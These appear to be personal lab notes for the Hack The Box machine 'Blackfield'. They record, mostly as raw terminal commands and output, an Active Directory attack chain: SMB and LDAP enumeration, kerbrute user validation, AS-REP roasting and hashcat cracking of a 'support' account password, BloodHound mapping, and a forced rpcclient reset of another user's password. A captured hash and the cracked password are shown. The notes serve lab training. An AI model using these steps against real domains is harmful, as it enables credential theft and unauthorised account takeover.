Blackfield

This is a windows machine from hack the box.

nmap scan

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA blackfield 10.10.10.192 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:19 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.28 seconds
                                                                                                                                                           
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA -Pn blackfield 10.10.10.192
Output filename begins with '-'. Try '-oA ./-Pn' if you really want it to be named as such.
QUITTING!
                                                                                                                                                           
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA blackfield 10.10.10.192 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:20 EDT
Nmap scan report for 10.10.10.192
Host is up (0.35s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-10 08:20:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-09-10T08:21:08
|_  start_date: N/A
|_clock-skew: 7h00m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.68 seconds
                                                                

using crackmap exec on 445

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb  10.10.10.192-u "" up ""
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

checking on shares

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 –shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

┌──(kali㉿kali)-[~/HTB/blackfield]

add blackfield.local to hosts file

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local

try ldpsearch –ldapsearch -x -H ldap://10.10.10.192 -s base namingcontexts then ldapsearch -x -H ldap://10.10.10.192 -b ‘DC=blackfield,DC=local’ -s sub ‘(objectClass=person)’ sAMAccountName | grep ‘sAMAccountName:’ | awk -F ‘: ‘ ‘{print $2}’

no names

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -s base namingcontexts

# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=BLACKFIELD,DC=local
namingcontexts: CN=Configuration,DC=BLACKFIELD,DC=local
namingcontexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingcontexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local
namingcontexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -b 'DC=blackfield,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 


tried again without the grep

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -b 'DC=blackfield,DC=local' -s sub                                                                                          
# extended LDIF
#
# LDAPv3
# base <DC=blackfield,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

Trying with rpcclient and we are in. checking some commands but no access

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U ''
Password for [WORKGROUP\]:
rpcclient

gt; enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient


gt; Password for [WORKGROUP\]:
rpcclient


gt; enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient


gt;
^C

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U ”
Password for [WORKGROUP\]:
rpcclient


gt; netsharenum
command not found: netsharenum
rpcclient


gt; netshareenum
result was WERR_ACCESS_DENIED
rpcclient


gt;


trying GetNPUsers.py

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.192 -request 'blackfield.local/'
Impacket v0.11.0 - Copyright 2023 Fortra

[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

did a full nmap sacan

┌──(kali㉿kali)-[~/HTB/Forest]
└─$ nmap -p- -T4 -oA full 10.10.10.192 -Pn 

Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:55 EDT
Nmap scan report for blackfield.local (10.10.10.192)
Host is up (0.34s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
389/tcp  open  ldap
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
3268/tcp open  globalcatLDAP
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 564.16 seconds

checked smb shares

┌──(kali㉿kali)-[~/HTB/Forest]
└─$ smbclient -L //10.10.10.192
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

there is a folder called forensic. we can recursivly check this with

smbclient //10.10.10.192/forensic -U “”%””

┌──(kali㉿kali)-[~/HTB/Forest]
└─$ smbclient //10.10.10.192/forensic -U ""%""
tree connect failed: NT_STATUS_ACCESS_DENIED
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/Forest]

tried enum4linux – no luck

┌──(kali㉿kali)-[~]
└─$ enum4linux -S 10.10.10.192

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Sep  9 23:03:37 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.192
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.192 )============================


[E] Can't find workgroup/domain



 ===================================( Session Check on 10.10.10.192 )===================================


[+] Server 10.10.10.192 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.10.192 )================================

Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290

[+] Host is part of a domain (not a workgroup)


 =================================( Share Enumeration on 10.10.10.192 )=================================

do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)                                           

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.192                                                                         
                                                                                                                     
enum4linux complete on Sat Sep  9 23:04:04 2023                                                                      


checked the profiles$ — smbclient \\10.10.10.192\profiles$ -U ”

                                                                                                                    
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ smbclient \\\\10.10.10.192\\profiles$ -U ''    
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  3 12:47:12 2020
  ..                                  D        0  Wed Jun  3 12:47:12 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  ABekesz                             D        0  Wed Jun  3 12:47:11 2020
  ABenzies                            D        0  Wed Jun  3 12:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 12:47:11 2020
  AChampken                           D        0  Wed Jun  3 12:47:11 2020
  ACheretei                           D        0  Wed Jun  3 12:47:11 2020
  ACsonaki                            D        0  Wed Jun  3 12:47:11 2020
  AHigchens                           D        0  Wed Jun  3 12:47:11 2020
  AJaquemai                           D        0  Wed Jun  3 12:47:11 2020
  AKlado                              D        0  Wed Jun  3 12:47:11 2020

outputting all these to a users.txt file

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ more users.txt   
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  ABekesz                             D        0  Wed Jun  3 12:47:11 2020
  ABenzies                            D        0  Wed Jun  3 12:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 12:47:11 2020
  AChampken                           D        0  Wed Jun  3 12:47:11 2020

cleaned the file so that left only with username –awk ‘{print $1}’ users.txt > cleaned_users.txt

──(kali㉿kali)-[~/HTB/blackfield]
└─$ awk '{print $1}' users.txt > cleaned_users.txt

                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nano cleaned_users.txt 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
blackfield.gnmap  blackfield.nmap  blackfield.xml  cleaned_users.txt  kerbrute  users.txt
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]

addded “administrator” on the text file then use kerbrute to see which usernames are valid

 ./kerbrute userenum --dc 10.10.10.192 -d  blackfield.LOCAL cleaned_users.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/09/23 - Ronnie Flathers @ropnop

2023/09/09 23:24:27 >  Using KDC(s):
2023/09/09 23:24:27 >   10.10.10.192:88

2023/09/09 23:24:33 >  [+] VALID USERNAME:       [email protected]
2023/09/09 23:24:50 >  [+] VALID USERNAME:       [email protected]
2023/09/09 23:27:01 >  [+] VALID USERNAME:       [email protected]
2023/09/09 23:27:01 >  [+] VALID USERNAME:       [email protected]


We get the user audit2020,support and svc_backup

we try GetNPUsers.py blackfield.LOCAL/audit2020 etc

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/audit2020                                  
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate audit2020, getting its TGT
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/support  
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate support, getting its TGT
[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/svc_backup
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate svc_backup, getting its TGT
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]

we get support. we try and crack with hashcat

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ cd ~/usr/bin                                
cd: no such file or directory: /home/kali/usr/bin
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ cd /usr/bin 
                                                                                                                     
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat --example-hashes | less


Hash mode #18200
  Name................: Kerberos 5, etype 23, AS-REP
  Category............: Network Protocol
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
  Example.Pass........: hashcat
  Benchmark.Mask......: ?b?b?b?b?b?b?b
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX

copy the has to file
“`bash
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cat blackfield
$krb5asrep

23

[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ clear

Try and crack with hashcat and cracked as #00^BlackKnight


┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 18200 /home/kali/HTB/blackfield/blackfield /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab:#00^BlackKnight
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:3c5c336ce929...a1f2ab
Time.Started.....: Sat Sep  9 23:39:08 2023 (30 secs)
Time.Estimated...: Sat Sep  9 23:39:38 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   465.6 kH/s (2.91ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14333952/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1crapper -> #!hrvert
Hardware.Mon.#1..: Util: 73%

Started: Sat Sep  9 23:39:06 2023
Stopped: Sat Sep  9 23:39:39 2023

try crackmapexec and we get the shares

└─$ crackmapexec smb 10.10.10.192 --shares -u support -p '#00^BlackKnight'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 

lets try with winrm – no luck

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec winrm  10.10.10.192 -u support -p '#00^BlackKnight' 
SMB         10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [-] BLACKFIELD.local\support:#00^BlackKnight
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]

try rpcclient with the support credentials then we do an enumaration of domain users — enumdomusers and we get a bunch of usernames

rpcclient

gt; enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
user:[BLACKFIELD553715] rid:[0x457]
user:[BLACKFIELD840481] rid:[0x458]
user:[BLACKFIELD622501] rid:[0x459]
user:[BLACKFIELD787464] rid:[0x45a]
user:[BLACKFIELD163183] rid:[0x45b]
user:[BLACKFIELD869335] rid:[0x45c]
user:[BLACKFIELD319016] rid:[0x45d]


We output this to a file and lean it so we only have the usernames . Then we use kerbrute by going through each user via bash command as below
while read -r user; do
    ./GetNPUsers.py blackfield.LOCAL/$user -no-pass -dc-ip 10.10.10.192
done < /home/kali/HTB/blackfield/cleanusers2.txt

we get output as below and we get no hash so no luck

    ./GetNPUsers.py blackfield.LOCAL/$user -no-pass -dc-ip 10.10.10.192
done < /home/kali/HTB/blackfield/cleanusers2.txt

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for BLACKFIELD764430
[-] User BLACKFIELD764430 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for BLACKFIELD538365
[-] User BLACKFIELD538365 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for BLACKFIELD189208
[-] User BLACKFIELD189208 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for BLACKFIELD404458
[-] User BLACKFIELD404458 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

We try a python script — bloodhound.py. I want to use the bloodhound 3. so we install as below

Bloodhound.py is the same as shapehound but running it from the linux machine and will generate some json that we can import to bloodhound

pip install BloodHound==1.1.1

add the directory to the path

export PATH=$PATH:/home/kali/.local/bin

we then run the command — bloodhound-python -u support -p ‘#00^BlackKnight’ -ns 10.10.10.192 -d blackfield.local -c all

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 315 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 01M 12S
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json  20230910090640_users.json  blackfield.nmap    cleanusers2.txt  users.txt
20230910090640_domains.json    blackfield                 blackfield.xml     kerbrute
20230910090640_groups.json     blackfield.gnmap           cleaned_users.txt  users2.txt
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]

We start neo4j and also bloodhound and load these files

neo4j

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo neo4j console                                               
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 
Active database: graph.db
Directories in use:
  home:         /var/lib/neo4j
  config:       /etc/neo4j
  logs:         /var/log/neo4j
  plugins:      /var/lib/neo4j/plugins
  import:       /var/lib/neo4j/import
  data:         /var/lib/neo4j/data
  certificates: /var/lib/neo4j/certificates
  run:          /var/run/neo4j
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2023-09-10 13:10:15.848+0000 INFO  ======== Neo4j 3.5.35 ========
2023-09-10 13:10:15.891+0000 INFO  Starting...
2023-09-10 13:10:20.194+0000 INFO  Bolt enabled on 127.0.0.1:7687.
2023-09-10 13:10:23.362+0000 INFO  Started.
2023-09-10 13:10:25.396+0000 INFO  Remote interface available at http://localhost:7474/
2023-09-10 13:10:47.620+0000 WARN  The client is unauthorized due to authentication failure.

bloodhound

└─$ ls
 BloodHound-3.0.5   BloodHound-3.0.5.zip   BloodHound-linux-x64  'BloodHound-linux-x64(1).zip'
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-linux-x64
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ls
BloodHound              icudtl.dat    libvk_swiftshader.so    locales            swiftshader
chrome_100_percent.pak  libEGL.so     libvulkan.so            resources          v8_context_snapshot.bin
chrome_200_percent.pak  libffmpeg.so  LICENSE                 resources.pak      version
chrome-sandbox          libGLESv2.so  LICENSES.chromium.html  snapshot_blob.bin  vk_swiftshader_icd.json
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ./BloodHound                                                              
(node:358673) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.

i am going to try aclpwn to see what i can get after loading to bloodhound

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ~/.local/bin/aclpwn -f [email protected] -t blackfield.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.192 -sp '#00^BlackKnight' 
[!] No path found!
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]

manually looking at the bloodhound and we see support can change the password for AUDIT2020

![[Pasted image 20230910213306.png]]

we can change the password from Rpcclient using this command i got from chatGPT –rpcclient $> setuserinfo2 [username] 23 ‘[newpassword]’

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U support
Password for [WORKGROUP\support]:
rpcclient

gt; setuserinfo2 audit2020 23 ‘Password123!’
rpcclient


gt;


we try crackmapexec with winrm -- no luck on winrm
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb  10.10.10.192 -u audit2020 -p 'Password123!'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Password123! 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec winrm 10.10.10.192 -u audit2020 -p 'Password123!'
SMB         10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [-] BLACKFIELD.local\audit2020:Password123!
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

checking the shares by this user — crackmapexec smb 10.10.10.192 -u audit2020 -p ‘Password123!’ –shares

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb  10.10.10.192 -u audit2020 -p 'Password123!' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Password123! 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

We can now read the forensic folder

We open this using smbclient — smbclient \\10.10.10.192\forensic -U audit2020%’Password123!’. I then get all the txt files i see

└─$ smbclient \\\\10.10.10.192\\forensic -U audit2020%'Password123!'

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

                5102079 blocks of size 4096. 1678453 blocks available
smb: \> cd commands_output 
smb: \commands_output\> ls
  .                                   D        0  Sun Feb 23 13:14:37 2020
  ..                                  D        0  Sun Feb 23 13:14:37 2020
  domain_admins.txt                   A      528  Sun Feb 23 08:00:19 2020
  domain_groups.txt                   A      962  Sun Feb 23 07:51:52 2020
  domain_users.txt                    A    16454  Fri Feb 28 17:32:17 2020
  firewall_rules.txt                  A   518202  Sun Feb 23 07:53:58 2020
  ipconfig.txt                        A     1782  Sun Feb 23 07:50:28 2020
  netstat.txt                         A     3842  Sun Feb 23 07:51:01 2020
  route.txt                           A     3976  Sun Feb 23 07:53:01 2020
  systeminfo.txt                      A     4550  Sun Feb 23 07:56:59 2020
  tasklist.txt                        A     9990  Sun Feb 23 07:54:29 2020

                5102079 blocks of size 4096. 1678453 blocks available
smb: \commands_output\> cat domain_users.txt
cat: command not found
smb: \commands_output\> get domain_admins.txt
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \commands_output\> get *.txt
NT_STATUS_OBJECT_NAME_INVALID opening remote file \commands_output\*.txt
smb: \commands_output\> get domain_groups.txt
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (0.7 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \commands_output\> get domain_users.txt
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (11.7 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \commands_output\> 

When we cat domain usere.txt we see a new user Ipwn3dYouCompany

BLACKFIELD969352         BLACKFIELD971417         BLACKFIELD978938         
BLACKFIELD990638         BLACKFIELD991588         BLACKFIELD994577         
